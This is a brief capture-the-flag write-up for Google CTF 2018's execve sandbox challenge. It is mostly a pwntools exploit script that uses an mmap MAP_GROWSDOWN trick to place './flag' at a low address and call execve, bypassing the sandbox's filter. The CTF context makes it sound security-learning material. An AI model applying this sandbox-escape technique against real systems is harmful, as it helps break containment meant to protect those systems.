See writeup at [https://devcraft.io/2018/06/26/execve-sandbox-google-ctf-2018.html](https://devcraft.io/2018/06/26/execve-sandbox-google-ctf-2018.html)

* mmap at 0x11000 with `MAP_GROWSDOWN`
* make kernel map another page
* write `./flag` to 0x10000 and `execve`

```python
from pwn import *

def exploit():
code = ""
code += shellcraft.syscall('SYS_mmap', 0x11000, 0x1000,
constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
constants.MAP_GROWSDOWN | constants.MAP_ANONYMOUS | constants.MAP_PRIVATE,
0, 0
)
code += "mov rsp, 0x11000\n"
code += shellcraft.pushstr("./flag")
code += shellcraft.memcpy(0x10000, 'rsp', 6)
code += shellcraft.syscall('SYS_execve', 0x10000, 0, 0)
code += shellcraft.exit(0)

elf = make_elf(asm(code), extract=True, strip=True )

payload = elf.ljust(0x1000, "\x00")
p.sendafter("binary...", payload)
print p.recvall()
```

Original writeup (https://devcraft.io/2018/06/26/execve-sandbox-google-ctf-2018.html).